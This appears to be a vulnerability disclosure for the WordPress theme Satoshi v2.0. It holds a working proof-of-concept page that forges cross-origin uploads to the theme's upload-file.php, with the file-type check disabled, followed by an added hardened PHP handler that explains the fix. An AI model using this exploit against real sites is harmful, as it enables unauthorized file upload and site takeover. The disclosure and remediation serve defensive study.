Created December 6, 2014 09:39
Satoshi v2.0 - CSRF
Theme Name: Satoshi v2.0
Theme URI: http://www.vooshthemes.com
Description: A Free Portfolio Theme Developed By Voosh Themes. Please look at the <a href="../wp-content/themes/satoshi/instructions/instructions.html">instructions</a> that are included with the file you downloaded <a href="../wp-content/themes/satoshi/instructions/instructions.html">(satoshi/instructions/instructions.html)</a> for details about how to configure this theme.
Author: Voosh Themes
Author URI: http://www.vooshthemes.com

wp-content/themes/satoshi/upload-file.php vulnerable to CSRF file upload via ajaxupload.3.5.js

Localhost Demo:

<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <title></title>
  <script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
  <script type='text/javascript' src="http://localhost/wp-content/themes/satoshi/js/ajaxupload.3.5.js"></script>
  <script type='text/javascript'>//<![CDATA[
  window.onload=function(){
    $(function(){
      var btnUpload=$('#upload');
      var status=$('#logo-upload-status');
      new AjaxUpload(btnUpload, {
        action: 'http://localhost/wp-content/themes/satoshi/upload-file.php',
        name: 'uploadfile',
        onSubmit: function(file, ext){
          /*
          if (! (ext && /^(jpg|png|jpeg|gif)$/.test(ext))){
            // extension is not allowed
            status.text('Only JPG, PNG or GIF files are allowed');
            return false;
          }*/
          status.text('Uploading...');
        },
        onComplete: function(file, response){
          //On completion clear the status
          status.text('');
          //Add uploaded file to list
          if(response==="success"){
            $('<li></li>').appendTo('#files').html('<img src="http://localhost/wp-content/themes/satoshi/images/'+file+'" alt="" /><br />'+file).addClass('success');
            $('#satoshi_logo_image').val(file);
          } else{
            $('<li></li>').appendTo('#files').text(file).addClass('error');
          }
        }
      });
    });
  }//]]>
  </script>
</head>
<body>
  <span id="logo-upload-status"></span>
  <input class="logo-name" id="satoshi_logo_image" type="text" name="satoshi_logo_image" value="">
  <input type="button" class="background_pattern_button" id="upload" value="Choose Logo">
</body>
</html>
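The demo above works because the theme's upload endpoint accepts any cross-origin POST and leaves the file-type check to the browser. The following is an added example of what a hardened handler looks like; it is not the Satoshi theme's upload-file.php (that file is not in the gist). It assumes, from the PoC, a multipart POST with a file field named `uploadfile` and a caller that expects the response body `success`; the nonce action name `satoshi_logo_upload`, the `_ajax_nonce` field and the wp-load.php path are assumptions.

```php
<?php
// Added illustrative hardening of an upload endpoint; NOT the Satoshi theme's
// upload-file.php, which is not reproduced in the gist. Assumed from the PoC:
// a multipart POST with a file field named "uploadfile" and a caller that
// expects the literal response body "success". The nonce action name
// "satoshi_logo_upload" and the field "_ajax_nonce" are assumptions.
require_once dirname(__FILE__) . '/../../../wp-load.php';   // assumed path from the theme dir
require_once ABSPATH . 'wp-admin/includes/file.php';         // provides wp_handle_upload()

// 1. CSRF: require a nonce bound to the logged-in user's session. A third-party
//    page such as the PoC cannot read it, so its forged POST fails here.
if (empty($_POST['_ajax_nonce']) || !wp_verify_nonce($_POST['_ajax_nonce'], 'satoshi_logo_upload')) {
    status_header(403);
    exit('invalid nonce');
}

// 2. Authorisation: only users who may edit theme options may change the logo.
if (!is_user_logged_in() || !current_user_can('edit_theme_options')) {
    status_header(403);
    exit('forbidden');
}

// 3. Server-side file-type check. The extension regex in the theme's JS
//    (shown commented out in the PoC) runs in the uploader's browser and is
//    not a control; the type is verified here from the actual file content.
if (empty($_FILES['uploadfile']) || $_FILES['uploadfile']['error'] !== UPLOAD_ERR_OK) {
    status_header(400);
    exit('no file');
}
$allowed = array('jpg|jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif');
$check = wp_check_filetype_and_ext($_FILES['uploadfile']['tmp_name'],
                                   $_FILES['uploadfile']['name'], $allowed);
if (empty($check['ext']) || empty($check['type'])) {
    status_header(400);
    exit('file type not allowed');
}

// 4. Let WordPress store the file: it sanitises the name, rejects PHP and
//    other non-whitelisted types again, and writes under wp-content/uploads
//    rather than into the theme's own images/ directory.
$result = wp_handle_upload($_FILES['uploadfile'], array('test_form' => false, 'mimes' => $allowed));
if (isset($result['error'])) {
    status_header(500);
    exit('upload failed');
}
echo 'success';
```

The admin page that renders the "Choose Logo" button would mint the token with `wp_create_nonce('satoshi_logo_upload')` and send it as a POST field alongside the file.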